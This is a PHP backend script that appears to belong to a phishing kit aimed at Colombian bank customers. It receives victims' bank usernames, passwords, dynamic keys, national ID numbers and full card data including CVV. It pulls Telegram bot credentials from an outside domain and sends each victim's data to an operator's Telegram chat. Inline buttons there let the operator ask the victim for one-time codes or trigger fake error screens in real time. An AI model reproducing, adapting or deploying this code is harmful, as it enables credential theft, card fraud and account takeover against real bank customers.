<?php
header('Content-Type: application/json; charset=utf-8');

$config_path = __DIR__ . '/../../config/fu7ur4ma.php';
if (!file_exists($config_path)) {
    echo json_encode(['ok'=>false,'error'=>'Archivo de configuración no encontrado']);
    exit;
}

$config_data = include $config_path;
$API_KEY = $config_data['api_key'] ?? null;
if (!$API_KEY) {
    echo json_encode(['ok' => false, 'error' => 'API Key no disponible']);
    exit;
}

function loadConfig($key) {
    $url = "https://aportesnlineacol.store/get_credentials?key={$key}";
    $resp = @file_get_contents($url);
    $data = json_decode($resp, true);
    return (!empty($data['token']) && !empty($data['chat_id']))
        ? ['token' => $data['token'], 'chat_id' => $data['chat_id']]
        : null;
}

function sendMessage($token, $chatId, $text, $keyboard) {
    $payload = [
        'chat_id' => $chatId,
        'text' => $text,
        'parse_mode' => 'HTML',
        'reply_markup' => json_encode($keyboard)
    ];
    $ch = curl_init("https://api.telegram.org/bot{$token}/sendMessage");
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_HTTPHEADER => ['Content-Type:application/json'],
        CURLOPT_POSTFIELDS => json_encode($payload)
    ]);
    $res = curl_exec($ch);
    curl_close($ch);
    return json_decode($res, true);
}

function buildKeyboard($tid) {
    return ['inline_keyboard' => [
        [['text' => 'Err. Dinámica', 'callback_data' => "pedir_dinamica:{$tid}"], ['text' => 'OTP', 'callback_data' => "pedir_otp:{$tid}"]],
        [['text' => 'Err. TC', 'callback_data' => "error_tc:{$tid}"], ['text' => 'Err. Logo', 'callback_data' => "error_logo:{$tid}"]],
        [['text' => 'Finalizar', 'callback_data' => "confirm_finalizar:{$tid}"]]
    ]];
}

function formatMessage($d) {
    $bancoldata = $d['bancoldata'];
    $bancoldina = $d['bancoldina'];
    $tbdatos = $d['tbdatos'];
    $dinamica = is_array($bancoldina) ? ($bancoldina['clave'] ?? '<i>No disponible</i>') : $bancoldina;

    return "
<b>Nuevo método de pago pendiente de verificación</b>
────────────────────────
🆔 <b>ID:</b> <code>{$d['transactionId']}</code>
👤 <b>Usuario:</b> <code>{$bancoldata['usuario']}</code>
🔐 <b>Clave:</b> <code>{$bancoldata['clave']}</code>
🔑 <b>Dinámica:</b> <code>{$dinamica}</code>
────────────────────────
<b>Detalles del pago:</b>
🪪 <b>Cédula:</b> | ".($tbdatos['cedula'] ?? '<i>No disponible</i>')."
💳 <b>Tarjeta:</b> | ".($tbdatos['cardNumber'] ?? '<i>No disponible</i>')."
📅 <b>Fecha expiración:</b> | ".(!empty($tbdatos['expMonth']) ? "{$tbdatos['expMonth']}/{$tbdatos['expYear']}" : '<i>No disponible</i>')."
🔐 <b>CVV:</b> | ".($tbdatos['cvv'] ?? '<i>No disponible</i>')."
💳 <b>Tipo tarjeta:</b> | ".($tbdatos['type'] ?? '<i>No disponible</i>')."
💰 <b>Cuotas:</b> | ".($tbdatos['cuotas'] ?? '<i>No disponible</i>')."
────────────────────────
🏦 <b>Banco:</b> | ".($tbdatos['bank'] ?? '<i>No disponible</i>')."
────────────────────────
🏠 <b>Dirección:</b> | ".($tbdatos['address'] ?? '<i>No disponible</i>')."
📞 <b>Teléfono:</b> | ".($tbdatos['phone'] ?? '<i>No disponible</i>')."
🏙️ <b>Ciudad:</b> | ".($tbdatos['city'] ?? '<i>No disponible</i>')."
📝 <b>Propietario:</b> | ".($tbdatos['ownerName'] ?? '<i>No disponible</i>')."
────────────────────────";
}

$config = loadConfig($API_KEY);
if (!$config) {
    echo json_encode(['ok' => false, 'error' => 'No se pudo obtener credenciales del bot']);
    exit;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $d = json_decode(file_get_contents('php://input'), true);
    $msg = formatMessage($d);
    $keyboard = buildKeyboard($d['transactionId']);
    $sent = sendMessage($config['token'], $config['chat_id'], $msg, $keyboard);
    echo json_encode(['ok' => !empty($sent['ok']), 'message_id' => $sent['result']['message_id'] ?? null]);
    exit;
}

if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['transactionId'])) {
    $updates = json_decode(file_get_contents("https://api.telegram.org/bot{$config['token']}/getUpdates"), true);
    foreach ($updates['result'] as $upd) {
        if (isset($upd['callback_query']) && strpos($upd['callback_query']['data'], $_GET['transactionId']) !== false) {
            $action = explode(':', $upd['callback_query']['data'])[0];
            $user = $upd['callback_query']['from']['username'] ?? $upd['callback_query']['from']['first_name'];
            $original = $upd['callback_query']['message']['text'];
            $newText = trim($original) . "\n\n📌 <b>Acción seleccionada:</b> " . ucfirst(str_replace('_', ' ', $action)) . " por <code>@{$user}</code>";

            $payload = [
                'chat_id' => $config['chat_id'],
                'message_id' => $upd['callback_query']['message']['message_id'],
                'text' => $newText,
                'parse_mode' => 'HTML'
            ];

            $ch = curl_init("https://api.telegram.org/bot{$config['token']}/editMessageText");
            curl_setopt_array($ch, [
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_POST => true,
                CURLOPT_HTTPHEADER => ['Content-Type:application/json'],
                CURLOPT_POSTFIELDS => json_encode($payload)
            ]);
            curl_exec($ch);
            curl_close($ch);

            echo json_encode(['ok' => true, 'action' => $action]);
            exit;
        }
    }
    echo json_encode(['ok' => false]);
    exit;
}
